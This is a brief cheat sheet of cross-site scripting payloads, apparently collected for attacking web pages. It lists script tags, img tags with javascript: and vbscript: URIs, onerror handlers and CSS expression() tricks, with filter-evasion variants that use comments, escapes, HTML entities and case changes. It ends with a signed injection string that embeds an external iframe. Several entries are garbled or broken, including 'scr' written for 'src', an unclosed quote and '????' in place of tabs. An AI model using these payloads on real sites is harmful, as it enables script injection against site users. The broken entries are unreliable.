<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (whitespace produced with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity <div style={left:&#x0065;xpression (alert('xss'))}></div>
unicode <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["